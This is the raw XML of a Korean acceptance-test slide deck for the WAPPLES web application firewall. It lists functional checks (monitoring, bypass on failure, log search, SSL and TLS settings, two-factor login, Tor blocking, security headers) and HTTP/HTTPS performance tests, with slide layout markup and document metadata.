                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>Positive, Negative, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>사용자 정의 정책을 지원 하는지 여부 확인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Positive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정책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, Negative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정책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지원 확인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사용자 정의 정책 지원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2028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828905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3.2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실시간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시간대별 세션정보 및 데이터 모니터링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분석 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실시간 로그 및 세션 정보 확인 가능 한지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실시간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시간대별 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ko-KR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세션정보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및 데이터 모니터링기능을 지원 여부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4654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73766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3.3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실시간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시간대별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Web </a:t>
                      </a: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트래픽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및 시스템 자체 </a:t>
                      </a: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부하량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표시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실시간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시간대별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Web </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ko-KR" alt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트래픽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및 시스템 리소스 사용량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실시간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시간대별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Web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트래픽 및 시스템 자체 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="10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부하량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 표시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HTTP/HTTPS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분리 표기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1076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478016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3.4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장애 시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Bypass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기능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Bypass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기능 확인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장애 시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Bypass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기능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- S/W Bypass, H/W Bypass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모두 가능 해야 함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.</a:t>
                      </a:r>
                      <a:b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-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시스템 상의 </a:t>
                      </a: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Session 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처리 여부 확인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9293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0794121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3.5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탐지 이벤트에 대한 각종 조건 검색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로그 검색 시 조건 검색 여부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출발지 및 목적지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IP /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대역 별 검색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국가별 검색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URI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별 검색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정책 별 검색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룰별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검색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응답코드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또는 대응 별 검색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9910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582889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3.6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보고서 기능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보고서 기능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일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주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월별 보고서 기능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선택적인 기간별 보고서가 생성되는지 확인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정책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웹사이트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u="none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룰별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보고서 기능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사용자가 선택한 정책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웹사이트 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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000" u="none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룰 별 보고서가 생성되는지 확인</a:t>
                      </a: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ko-KR" sz="1000" u="none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35630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4198951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3.7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시스템 접속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정책변경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시스템 자체 침입에 대한 이벤트 등의 감사 기능</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"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관리도구에 접속하는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PC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의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IP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및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ID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기록 여부 및 각 시스템 변경 사항 감사 기능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GUI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의 감사 기능 확인</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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en-US" altLang="ko-KR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CLI</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ko-KR" alt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n-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>의 감사 기능 확인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97486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273798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3.8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시스템 주요파일 백업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복구 기능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정책 및 각 설정에 대해서 백업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/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복구 기능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정책 백업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로그 백업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105894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704620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3.9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장비 및 주요 이벤트 알람 및 메시지 기능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특정 이벤트에 대해서 알림 창 여부 및 이메일로 회신 기능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알람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및 메시지 기능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 -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환경설정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운영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자가점검 기능설정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34804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0783414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3.10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홈페이지 관리자 접근제어 기능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관리도구 접근 시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,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관리자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IP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 대해서만 허용이 가능한지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GUI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에서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계정별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허용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IP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접근제어 설정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미 허용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IP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GUI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접속 시 차단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75454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779300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3.11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예외처리 지원 방식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다양한 예외처리 방식에 대한 지원여부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특정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URL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대한 탐지 예외처리 확인</a:t>
                      </a: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특정 패턴에 대한 예외처리 확인</a:t>
                      </a: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특정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IP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대한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Bypass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처리 확인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특정 출발지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IP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및 대상에 대한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Bypass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등록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2006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579984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3.12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관제시스템 연동 지원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SNMP Trap, SNMP Agent, SIEM/SYSLOG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연동 지원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 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환경설정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연동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SNMP Trap, SNMP Agent, SIEM/SYSLOG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연동 설정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8082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222173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3.13 SSL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인증서 관리 지원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사이트 내 인증서 관리 시 체계적으로 관리 할 수 있는 인터페이스 제공 여부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인증서 등록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삭제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열람이 가능하도록 관리 화면 제공여부 확인</a:t>
                      </a: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개별 인증서 만료일 확인 가능 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 2)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인증서 사용 서버 존재여부 확인 가능 기능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인증서 만료 전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알람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및 메일 전송 기능 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 startAt="2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인증서 통합관리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1)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프로파일에 최초 등록 시 중복 등록 없이 여러 보호대상에서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활용 가능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52011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9236011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3.14 SSL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인증서 만료일전에 알림 기능 지원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SSL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프로파일 인증서 기간 만료일전 알림 기능 지원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UI-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환경설정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운영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자가점검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–SSL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인증서 만료 알림 설정 확인</a:t>
                      </a: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78466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541748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3.15 TLS 1.3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지원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HTTPS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통신 프로토콜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TLS 1.3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지원 설정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UI – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1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보안설정 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1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–SSL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1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프로파일 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1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인증서 수정 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1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– TLS 1.3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern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+mj-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>설정 확인</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" altLang="ko-KR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0328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91786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3.16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탐지로그 검색관리 및 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탐지로그의 검색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편의성 및 주요 정보 제공 여부를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다양한 로그 검색 기준 지원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1)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차단된 로그 검색 여부 확인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2)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검색 대상 다중 선택 지원 여부 확인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3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응답 코드를 사용하여 사이트 내 없는 페이지에 시도된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공격유형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검색가능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여부를 확인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2.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복합 조건을 선택한 로그 검색 필터 저장 및 사용 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71805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097665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latinLnBrk="1"/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3.17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임시페이지 기능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임시페이지를 설정하여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URL Redirection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기능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WAPPLES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설정된 보호대상에 임시페이지를 설정하여 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해당 페이지로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URL Redirection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기능 설정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  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777581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787663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3.18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이중화 장비간 정책 동기화 가능 여부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이중화된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웹방화벽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장비 간 정책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동기화 지원여부 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한대의 장비에서 정책 수정 시 다른 장비에서 반영 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350449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9447865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3.19-1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자가점검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CPU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CPU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부하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상황일때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알람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및 자동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SW-BYPASS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가 적용되는지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자가점검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CPU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관련 설정 적용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관리도구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운영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자가 점검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 CPU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사용량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[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수정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]</a:t>
                      </a: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임계값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및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알람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설정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자동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S/W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바이패스 설정 적용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장비내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CPU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부하를 발생 시켜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알람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및 자동으로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SW-Bypass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되는 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WAPPLES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stress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툴 설치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CPU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과부화 테스트 명령어 실행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200" y="3650575"/>
            <a:ext cx="3469958" cy="22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2251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7936530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3.19-2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자가점검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MEM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MEM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부하 상황일때 알람 확인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장비내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MEM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부하를 발생 시켜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UI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에서 알람 팝업이 발생하는지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04892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375461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3.19-3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자가점검 패킷 처리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패킷 처리 엔진 상태가 비정상일 경우 자동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HW-BYPASS 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가 적용되는지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자가점검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패킷 처리 엔진 다운 설정 적용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HW-BYPASS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 적용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장비 내 동작 중인 프로세스 강제 종료하여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자동으로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HW-BYPASS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적용되는지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marR="0" lvl="1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arenR"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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kill [pretzel </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0" i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프로세스 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0" dirty="0" err="1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pid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" i="0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]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0FE86BC0-8C63-4836-A9DB-9D146BC81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338" y="1857375"/>
            <a:ext cx="4185710" cy="15606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03642CB-09C1-4215-9F24-CD12F29C4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339" y="3552507"/>
            <a:ext cx="4185710" cy="25244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21459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 dirty="0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443286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3.20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국가정보원 검증필 암호 모듈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(CIS-CC v3.3)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탑재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국가정보원 검증필 암호 모듈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(CIS-CC v3.3)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적용 여부 확인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SFTP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접근 후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CIS-CC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라이브러리 정보 조회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685800" lvl="1" indent="-228600" latinLnBrk="1">
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicParenR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라이브러리 위치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: /</a:t>
                      </a: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usr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/lib/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" indent="0" latinLnBrk="1">
                        <a:buNone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Font typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod" startAt="2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CIS-CC v3.3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적용되어 있음을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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B95DA5-4E9B-45C9-907C-0A345D438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509" y="1874445"/>
            <a:ext cx="4148630" cy="9321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322226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 dirty="0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357421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3.21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관리자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0" err="1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로그인에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단계 인증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(2-Factor Authentication)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지원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 관리도구 관리자 계정 로그인시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단계 인증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(2-Factor Authentication)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방식 지원 확인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 관리도구에서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단계 인증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(2FA)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 적용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단계 인증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(2FA)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이 적용된 계정 로그인 시도 및 모바일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OTP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인증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311760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741462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3.22 HTTP/2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프로토콜 탐지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차단 기능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방화벽에서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HTTP2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프로토콜 탐지 처리 지원 가능 여부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 탐지로그에서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HTTP2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프로토콜 버전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HTTP/2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보호대상 패킷 덤프 수집 후 버전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613411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612776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3.23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관리도구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SSL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인증서 등록 추가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방화벽 관리도구에서 관리도구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SSL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인증서 추가 가능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 관리도구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인증서 설정에서 인증서 파일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개인키 파일 등록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92791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0326963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3.24 SSL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모니터링 기능 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방화벽에서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모니터링 기능 지원이 가능한지 여부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  <a:tabLst>
                          <a:tab pos="895350" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>GUI &gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>보안 설정 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>&gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>네트워크 설정 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>&gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>모니터링 모드 화면에서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>ON </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>설정 후 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>저장</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>]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98043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13802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3.25 Active-Standby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구성 환경에서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LLCF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기능 제공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방화벽에 이중화 구성 환경에서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LLCF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정상 작동 여부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H/W NIFC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S/W NIFC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정상 작동 여부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96861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088038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3.26 SSL Termination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기능 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HTTPS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를 지원하지 않는 웹 서버에서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SSL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통신을 사용하기 위한 기능 지원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 보호대상 등록 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 부분에서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SSL Termination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92453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8137705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3.27 Active-Active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이중화 구성 환경에서 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>Cross failover </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>기능 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방화벽에 이중화 구성 환경에서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ha-Cross-failover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기능 정상 작동 여부 확인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방화벽 이중화 장비 모두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default-act </a:t>
                      </a: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disconn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Ha-cross-failover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 후 한쪽 장비 링크 절단 시 반대 쪽 장비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default-act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설정이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bypass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로 변경되는지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76197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3577191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3.28 WebSocket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프로토콜 기반 탐지 여부 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웹 사이트에서 웹 소켓으로 오는 패킷에 대해 탐지한다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정책설정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웹 소켓 탐지 사용 설정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패킷덤프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수집 후 웹 소켓 정상 탐지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 descr="스크린샷, 컴퓨터, 노트북이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F455985-D0F2-4172-9491-6B3116069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1" y="1819138"/>
            <a:ext cx="4237038" cy="2124789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CCC4E19-043B-4B5E-B266-C9AF2161F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85" y="2395835"/>
            <a:ext cx="4218565" cy="250948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FF5C16BD-88BA-4719-8107-BE87D913A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9822" y="3943927"/>
            <a:ext cx="4218565" cy="347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1064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219132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3.29 TOR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네트워크 차단 기능 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TOR(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토르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) Browser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를 탐지하여 차단합니다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.</a:t>
                      </a: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보안 패치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Tor </a:t>
                      </a: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Broweser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TorBrowser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파일 업로드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선택한 파일 적용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375F85D5-4CB8-48C8-9797-6967DE1D0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1825" y="1812504"/>
            <a:ext cx="4246563" cy="221339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1EB7FFA-44BB-4875-83B2-88A333BFB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50" y="4042616"/>
            <a:ext cx="4237038" cy="239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5459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559502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3.30 Secure Response Headers : (X-Frame-Options, X-XSS-Protection, X-Content-Type-Options)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 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보안 관련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Header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를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Response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 추가하는 기능 검증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정책 설정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보안 헤더 설정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(X-Frame-Options, X-XSS-Protection, X-Content-Type-Options)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dirty="0" err="1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패킷덤프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수집 후 </a:t>
                      </a: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Response Headers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확인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" name="그림 4" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8789C9C2-23C4-4A91-87E2-97EBA48D2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878" y="1819591"/>
            <a:ext cx="4255510" cy="2256654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED84C60-DAD4-4918-94E2-03F940C194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0" y="4076245"/>
            <a:ext cx="4237038" cy="237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09253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5105881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3.31 SSL Cipher suite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외의 접속 시 차단 페이지 제공 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SSL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접속 실패 시 오류 페이지가 발생하는지 검증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정책 설정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SSL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접속 실패 시 오류 페이지 설정</a:t>
                      </a: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 descr="스크린샷, 컴퓨터, 노트북이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95A3E791-6CA2-4551-98B7-8BA3C6211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1" y="1828800"/>
            <a:ext cx="4237038" cy="246697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30C05BDF-DC8E-4090-9D25-A2860704B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50" y="3969045"/>
            <a:ext cx="4237038" cy="248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392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938710"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="788483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3.32 Session KEY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검색 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탐지로그에서 오류코드와 함께 세션 키 값을 활용하여 검색 필터 조건으로 활용 가능한지 검증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테스트 서버에 공격 진행 후 차단 페이지의 세션 키 확인 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR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 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탐지로그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추가조건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세션 키 추가 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탐지로그 조회 후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그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{795C7D53-D166-425F-8BD0-E238B8EC1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0" y="1805733"/>
            <a:ext cx="4237038" cy="2537667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 11" descr="스크린샷이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CA4E0E-7193-4A01-B921-6EA1EE39F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0" y="3987800"/>
            <a:ext cx="4237038" cy="237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9513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198964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3.33 GUI Customization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기능 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관리도구 화면의 헤더와 슬라이드 바 영역에 다양한 색상과 이미지를 적용하여 사용자만의 관리도구 구성 검증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상단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설정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관리도구 색상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이미지 적용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그림 5" descr="스크린샷, 컴퓨터, 노트북, 모니터이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD8A8F8D-0F41-4F91-9309-A0AE21272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1" y="1828800"/>
            <a:ext cx="4237038" cy="46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970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831798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3.34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보고서 포맷 설정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Pdf, Word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파일 형식 보고서 지원이 가능한지 확인 검증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보고서 생성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PDF, WORD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포맷 설정 및 출력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 descr="스크린샷, 노트북, 컴퓨터, 모니터이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5B6775-D4BA-49F4-AD9F-3AAAA7242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351" y="1838324"/>
            <a:ext cx="4237038" cy="215265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91992FF-B54E-4288-AADE-D3F1C81C97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50" y="3990974"/>
            <a:ext cx="2005418" cy="2449426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E546243-A888-4C46-ADEE-C9043E8A0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191" y="3990975"/>
            <a:ext cx="2202197" cy="2449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0054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230072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3.35 IP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리소스 파일 업데이트 기능 제공 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Geo IP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파일 업데이트 기능이 </a:t>
                      </a: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UI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에서 적용 가능한지 확인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보안설정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보안 패치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GEO IP </a:t>
                      </a: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GEO IP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파일 업로드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indent="-228600" latinLnBrk="1">
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pP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선택한 파일 적용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EC208838-FE20-4B23-9A07-110375F71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350" y="1816760"/>
            <a:ext cx="4237038" cy="229123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474F4F9-E530-40CD-B6E3-579E71F1D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50" y="4107992"/>
            <a:ext cx="4237038" cy="23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7262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기능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288550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3.36 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>감사로그 메모 강제 설정 기능 </a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="ko-KR" alt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kumimoji="0" lang="ko-KR" alt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감사로그에 대한 사용자 메모 설정 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indent="-228600" latinLnBrk="1">
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pP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UI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감사로그 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– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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로그 조회 후 사용자 메모 작성이 가능한지 확인</a:t>
                      </a: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그림 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAAEA999-4A78-4A11-8763-6418C905A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351" y="1809750"/>
            <a:ext cx="4237038" cy="463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2197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성능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 dirty="0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693865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4.1 HTTP 1024byte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CPS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 Response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Size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를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1024byte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 설정하여 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CPS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성능 수치 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 1024byte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CPS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- Request : Response = 1:1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4514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성능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 dirty="0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992578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4.2 HTTP 1024byte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TPS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 Response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Size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를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1024byte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 설정하여 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TPS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성능 수치 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 1024byte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TPS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- Request : Response = 1:10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86634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성능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 dirty="0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743340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4.3 HTTP 32Kbyte Throughput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 Response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Size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를 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32K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byte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 설정하여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Throughput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 32Kbyte Throughput</a:t>
                      </a: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- Request : Response = 1:10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34087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성능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 dirty="0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8648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4.1 HTTPS 1024byte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CPS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HTTPS Response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Size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를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1024byte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 설정하여 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CPS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성능 수치 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HTTPS 1024byte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CPS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- Request : Response = 1:1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65945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성능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 dirty="0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308953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4.2 HTTPS 1024byte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TPS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HTTPS Response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Size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를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1024byte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 설정하여 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TPS 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성능 수치 확인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HTTPS 1024byte</a:t>
                      </a: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 TPS</a:t>
                      </a:r>
                      <a:b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- Request : Response = 1:10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82477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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49667AC-AFBA-4DB1-8436-87BEBBE27770}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403200" y="382616"/>
            <a:ext cx="8370000" cy="2808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j-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>성능 평가 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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DF4237AE-7727-47AE-82D6-B287A52C7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072" y="956032"/>
            <a:ext cx="8395200" cy="5484368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="190500" lvl="1" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="아리따-돋움(TTF)-Light" pitchFamily="18" charset="-127"/>
                <a:ea typeface="아리따-돋움(TTF)-Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r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  <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="아리따-돋움(TTF)-Light" pitchFamily="18" charset="-127"/>
              <a:ea typeface="아리따-돋움(TTF)-Light" pitchFamily="18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4EA4819-6211-4C43-9927-5E6B6D562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5147750"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="832525"/>
          <a:ext cx="8474075" cy="5636101"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="75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05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시험번호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4.3 HTTPS 32Kbyte Throughput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아리따-돋움(TTF)-Light" pitchFamily="18" charset="-127"/>
                        <a:ea typeface="아리따-돋움(TTF)-Light" pitchFamily="18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96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+mj-ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>시험내용</a:t>
                      </a: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HTTPS Response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Size</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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를 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32K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byte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로 설정하여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Throughput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41" marR="91441" marT="45719" marB="4571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b="1" dirty="0">
                        <a:latin typeface="나눔고딕코딩" pitchFamily="49" charset="-127"/>
                        <a:ea typeface="나눔고딕코딩" pitchFamily="49" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91441" marR="91441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20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시험방법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ea"/>
                          <a:ea typeface="+mj-ea"/>
                        </a:rPr>
                        <a:t>시험결과</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91441" marR="91441" marT="45725" marB="4572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59362">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/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HTTPS 32Kbyte Throughput</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="120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</a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>- Request : Response = 1:10</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="120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ko-KR" sz="1000" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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endParaRPr kumimoji="0" lang="ko-KR" alt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91441" marR="91441"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445310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5402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Penta">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="999E9B"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="0060A9"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="30A2DB"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="1D7ED7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="1B5DA5"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="002060"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="C00000"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FFC000"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="309EFF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="8496B0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17085</TotalTime>
  <Words>6500</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>1483</Paragraphs>
  <Slides>102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102</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="115" baseType="lpstr">
      <vt:lpstr>.Lucida Grande UI Regular</vt:lpstr>
      <vt:lpstr>Bitstream Vera Sans Mono</vt:lpstr>
      <vt:lpstr>Malgun Gothic Semilight</vt:lpstr>
      <vt:lpstr>System Font Regular</vt:lpstr>
      <vt:lpstr>나눔고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>아리따-돋움(TTF)-Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>WAPPLES</vt:lpstr>
      <vt:lpstr>목차</vt:lpstr>
      <vt:lpstr>시험 개요</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>시험 구성도</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>시험 항목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송지록</dc:creator>
  <cp:lastModifiedBy>이 정윤</cp:lastModifiedBy>
  <cp:revision>694</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-01-20T06:50:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-24T08:49:50Z</dcterms:modified>
</cp:coreProperties>
</file>